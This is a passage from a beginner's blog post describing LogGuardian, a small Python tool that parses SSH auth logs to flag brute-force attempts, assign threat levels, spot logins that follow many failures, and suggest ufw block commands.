Failed password for root from 45.33.32.156 port 42190 ssh2 Mar 14 03:22:15 server sshd[9842]: Failed password for root from 45.33.32.156 port 42191 ssh2 Mar 14 03:22:16 server sshd[9843]: Failed password for admin from 45.33.32.156 port 42192 ssh2 </code></pre> </div> <p>This is not a user making mistakes.</p> <p>This is an <strong>automated brute-force attack</strong> happening right now.</p> <p>Here’s the scary part:</p> <p>Most beginners never open this file.<br> But attackers already know it exists.</p> <p>So I asked a simple question:</p> <blockquote> <p>What if I could automatically detect attacks just by reading logs?</p> </blockquote> <p>That became <strong>LogGuardian</strong>.</p> <h2> Where It Started (20 Lines) </h2> <p>My first version was extremely small.<br> It only counted failed logins per IP.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">re</span> <span class="kn">from</span> <span class="n">collections</span> <span class="kn">import</span> <span class="n">defaultdict</span> <span class="n">log_file</span> <span class="o">=</span> <span class="sh">"</span><span class="s">server.log</span><span class="sh">"</span> <span class="n">failed_attempts</span> <span class="o">=</span> <span class="nf">defaultdict</span><span class="p">(</span><span class="nb">int</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">log_file</span><span class="p">,</span> <span class="sh">"</span><span class="s">r</span><span class="sh">"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="nb">file</span><span class="p">:</span> <span class="k">if</span> <span class="sh">"</span><span class="s">Failed password</span><span class="sh">"</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span> <span class="n">ip</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">from (\d+\.\d+\.\d+\.\d+)</span><span class="sh">'</span><span class="p">,</span> <span class="n">line</span><span class="p">)</span> <span class="k">if</span> <span class="n">ip</span><span class="p">:</span> <span class="n">failed_attempts</span><span class="p">[</span><span class="n">ip</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)]</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">for</span> <span class="n">ip</span><span class="p">,</span> <span class="n">count</span> <span class="ow">in</span> <span class="n">failed_attempts</span><span class="p">.</span><span class="nf">items</span><span class="p">():</span> <span class="k">if</span> <span class="n">count</span> <span class="o">&gt;=</span> <span class="mi">3</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[ALERT] Possible brute-force attack from </span><span class="si">{</span><span class="n">ip</span><span class="si">}</span><span class="s"> (</span><span class="si">{</span><span class="n">count</span><span class="si">}</span><span class="s"> failed attempts)</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>It worked.</p> <p>But it was basically a calculator, not a security tool.</p> <p>Real security teams need answers like:</p> <ul> <li>Who is attacking?</li> <li>What usernames are targeted?</li> <li>Did the attacker actually succeed?</li> </ul> <p>So I kept going.</p> <h2> Turning Logs Into Intelligence </h2> <p>SSH logs actually contain multiple types of events:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Event</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td>Failed password</td> <td>Wrong password attempt</td> </tr> <tr> <td>Invalid user</td> <td>Username doesn't exist</td> </tr> <tr> <td>Accepted password</td> <td>Successful login</td> </tr> <tr> <td>Accepted publickey</td> <td>SSH key login</td> </tr> </tbody> </table></div> <p>So I upgraded the parser to track:</p> <ul> <li>IP addresses</li> <li>usernames targeted</li> <li>successful logins</li> <li>timestamps</li> </ul> <p>Key trick:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">errors</span><span class="o">=</span><span class="sh">"</span><span class="s">replace</span><span class="sh">"</span> </code></pre> </div> <p>Attackers sometimes send malformed bytes. Without this, one bad line crashes your program. Real logs are messy. Security tools must survive messy data.</p> <h2> The First Real Security Feature — Threat Levels </h2> <p>Three failed attempts ≠ 3000 failed attempts.</p> <p>So LogGuardian classifies attackers:</p> <ul> <li>🟢 LOW</li> <li>🟡 MEDIUM</li> <li>🟠 HIGH</li> <li>🔴 CRITICAL </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">threat_level</span><span class="p">(</span><span class="n">count</span><span class="p">,</span> <span class="n">thresholds</span><span class="p">):</span> <span class="n">low</span><span class="p">,</span> <span class="n">med</span><span class="p">,</span> <span class="n">high</span> <span class="o">=</span> <span class="n">thresholds</span> <span class="k">if</span> <span class="n">count</span> <span class="o">&gt;=</span> <span class="n">high</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">CRITICAL</span><span class="sh">"</span> <span class="k">elif</span> <span class="n">count</span> <span class="o">&gt;=</span> <span class="n">med</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">HIGH</span><span class="sh">"</span> <span class="k">elif</span> <span class="n">count</span> <span class="o">&gt;=</span> <span class="n">low</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">MEDIUM</span><span class="sh">"</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">LOW</span><span class="sh">"</span> </code></pre> </div> <p>Now the log file isn’t just text.</p> <p>It’s a <strong>threat map</strong>.</p> <h2> The Scariest Scenario (And Why This Matters) </h2> <p>I added one small check that changed everything:</p> <blockquote> <p>What if an IP fails many times… and then logs in successfully?<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">pwned</span> <span class="o">=</span> <span class="p">[(</span><span class="n">ip</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="k">for</span> <span class="n">ip</span><span class="p">,</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">sorted_ips</span> <span class="k">if</span> <span class="n">ip</span> <span class="ow">in</span> <span class="n">successful</span><span class="p">]</span> </code></pre> </div> <p>This detects:</p> <p><strong>Credential stuffing success.</strong></p> <p>In other words:</p> <p>The attacker guessed the password.</p> <p>LogGuardian marks it as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>⚠ DANGER ZONE — BREACH SUSPECTED 45.33.32.156 80 failures + 1 success </code></pre> </div> <p>That is literally how many real security incidents are first discovered.</p> <h2> Making a CLI Security Tool </h2> <p>I didn’t want a script.</p> <p>I wanted a tool.</p> <p>So I added <code>argparse</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python3 logguardian.py /var/log/auth.log </code></pre> </div> <p>Options:</p> <ul> <li>custom threat thresholds</li> <li>export report</li> <li>disable colors</li> <li>large log support</li> <li>generate a fake attacked log </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python3 logguardian.py --generate-sample </code></pre> </div> <p>This lets anyone test the tool instantly.</p> <h2> Actionable Output (Important) </h2> <p>Security tools should not just say:</p> <blockquote> <p>“Something is wrong.”</p> </blockquote> <p>They should say:</p> <blockquote> <p>“Here’s exactly what to do.”</p> </blockquote> <p>LogGuardian prints ready-to-use firewall commands:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>sudo ufw deny from 45.33.32.156 to any </code></pre> </div> <p>No guessing. No Googling under pressure.</p> <h2> What I Actually Learned </h2> <p>Today’s lesson was bigger than Python.</p> <p>I accidentally learned how <strong>SIEM systems</strong> work.</p> <p>Tools like:</p> <ul> <li>Splunk</li> <li>Wazuh</li> <li>Elastic Security</li> </ul> <p>do the same thing, just at massive scale.</p> <p>They:</p> <ol> <li>Collect logs</li> <li>Parse events</li> <li>Detect patterns</li> <li>Raise alerts</li> <li>Recommend response</li> </ol> <p>LogGuardian does all five.</p> <p>Just locally.</p> <p>Just with Python.</p> <h2> Try It Yourself </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python3 logguardian.py --generate-sample python3 logguardian.py server.log </code></pre> </div> <p>Or analyze your own machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>sudo python3 logguardian.py /var/log/auth.log </code></pre> </div> <p>You might be surprised.</p> <p>Even a personal computer gets login attempts from bots on the internet.</p> <h2> What’s Next </h2> <p>Planned upgrades:</p> <ul> <li>live monitoring mode (tail -f detection)</li> <li>automatic IP blocking</li> <li>GeoIP attacker mapping</li> <li>fail2ban integration</li> </ul> <p>We started this series by attacking vulnerable apps.</p> <p>Now we are detecting attackers.</p> <p>And that moment felt important.</p> <p>Because cybersecurity isn’t just breaking systems.</p> <p>It’s <strong>protecting people who don’t even know they were targeted.</strong></p> learning linux python cybersecurity